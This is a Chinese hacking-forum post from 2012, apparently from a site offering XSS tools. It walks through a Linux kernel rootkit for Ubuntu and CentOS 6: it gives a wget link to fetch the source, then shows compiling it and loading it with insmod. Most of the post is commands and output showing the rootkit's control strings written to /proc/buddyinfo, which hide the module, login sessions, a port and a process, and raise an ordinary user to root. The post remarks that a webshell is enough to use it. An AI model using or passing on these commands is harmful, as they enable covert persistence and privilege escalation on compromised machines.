切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
366 rootkit.c FOR ubuntu Centos6[复制链接]
发表于 2012-12-4 00:51:08 | 显示全部楼层 |!read_mode!
TESTING ubuntu Centos6
打开UBUNTU 首先下载
  1. root@Dis9Team:/tmp# wget http://lucky.fuzzexp.org/file/r00tk1t/rootkit.c.tar.gz
  2. root@Dis9Team:/tmp# tar xf rootkit.c.tar.gz
  3. root@Dis9Team:/tmp# cd rootkit/
复制代码
编译
  1. root@Dis9Team:/tmp/rootkit# make
  2. make -C /lib/modules/2.6.38-8-generic/build M=/tmp/rootkit modules
  3. make[1]: Entering directory `/usr/src/linux-headers-2.6.38-8-generic'
  4.   CC [M]  /tmp/rootkit/rootkit.o
  5.   Building modules, stage 2.
  6.   MODPOST 1 modules
  7.   CC      /tmp/rootkit/rootkit.mod.o
  8.   LD [M]  /tmp/rootkit/rootkit.ko
  9. make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-8-generic'
  10. root@Dis9Team:/tmp/rootkit#
复制代码


加载ROOTKIT模块
  1. root@Dis9Team:/tmp/rootkit# insmod rootkit.ko
复制代码


使用(使用不需要ROOTKI权限 一个WEBSHELL也行 懒得切换了):

隐藏模块

查看

  1. root@Dis9Team:/tmp/rootkit# lsmod | grep rootkit
  2. rootkit                19020  0
复制代码

隐藏

  1. root@Dis9Team:/tmp/rootkit# echo hide > /proc/buddyinfo
  2. -bash: echo: write error: Operation not permitted
复制代码

查看

  1. root@Dis9Team:/tmp/rootkit# lsmod | grep rootkit
复制代码

隐藏登录会话

  1. root@Dis9Team:/tmp/rootkit# w
  2. 19:13:39 up 3 min,  3 users,  load average: 0.13, 0.33, 0.16
  3. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  4. root     tty7     :0               19:10    3:15   0.99s  0.09s gnome-session -
  5. root     pts/0    :0.0             19:10    2:47   0.00s  0.00s bash
  6. root     pts/1    pc.local         19:11    0.00s  0.32s  0.00s w
  7. root@Dis9Team:/tmp/rootkit#
复制代码


隐藏
  1. root@Dis9Team:/tmp/rootkit# echo "huser root" > /proc/buddyinfo
  2. -bash: echo: write error: Operation not permitted
  3. root@Dis9Team:/tmp/rootkit# w
  4. 19:14:11 up 3 min,  0 users,  load average: 0.08, 0.30, 0.16
  5. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  6. root@Dis9Team:/tmp/rootkit#
复制代码


木游了隐藏端口
  1. root@Dis9Team:/tmp/rootkit# netstat -antp
  2. Active Internet connections (servers and established)
  3. Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
  4. tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      1771/sendmail: MTA:
  5. tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      675/sshd        
  6. tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      1379/cupsd      
  7. tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      1038/postgres   
  8. tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1771/sendmail: MTA:
  9. tcp        0      0 5.5.5.3:22              5.5.5.1:40610           ESTABLISHED 2179/1         
  10. tcp6       0      0 :::22                   :::*                    LISTEN      675/sshd        
  11. tcp6       0      0 ::1:631                 :::*                    LISTEN      1379/cupsd      
  12. root@Dis9Team:/tmp/rootkit#
复制代码


  1. tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      1771/sendmail: MTA:
复制代码


隐藏了
  1. root@Dis9Team:/tmp/rootkit# echo "hsport 587" >> /proc/buddyinfo
  2. -bash: echo: write error: Operation not permitted
  3. root@Dis9Team:/tmp/rootkit# netstat -antp | grep 587
  4. root@Dis9Team:/tmp/rootkit#
复制代码


获得ROOT权限
  1. brk@Dis9Team:/tmp/rootkit$ id
  2. uid=1000(brk) gid=1000(brk) groups=1000(brk),4(adm),20(dialout),24(cdrom),46(plugdev),112(lpadmin),120(admin),122(sambashare)
  3. brk@Dis9Team:/tmp/rootkit$ echo "root $" > /proc/buddyinfo
  4. bash: echo: write error: Operation not permitted
  5. brk@Dis9Team:/tmp/rootkit$ id
  6. uid=0(root) gid=0(root) groups=0(root)
  7. brk@Dis9Team:/tmp/rootkit$
复制代码


UID=0 你懂的隐藏进程
  1. brk@Dis9Team:/tmp/rootkit$ ps -ef | grep brk
  2. brk       2672  2266  0 19:16 pts/1    00:00:00 su brk
  3. brk       2679  2672  0 19:16 pts/1    00:00:00 bash
  4. root      2741  2679  0 19:17 pts/1    00:00:00 grep --color=auto brk
  5. brk@Dis9Team:/tmp/rootkit$
复制代码


把su brk隐藏了 ID= 2672
  1. brk@Dis9Team:/tmp/rootkit$ echo "hpid 2672" >> /proc/buddyinfo
  2. bash: echo: write error: Operation not permitted
  3. brk@Dis9Team:/tmp/rootkit$ ps -ef | grep brk
  4. brk       2679  2672  0 19:16 pts/1    00:00:00 bash
  5. root      2743  2679  0 19:18 pts/1    00:00:00 grep --color=auto brk
  6. brk@Dis9Team:/tmp/rootkit$
复制代码


su brk不在了



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 19:57

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部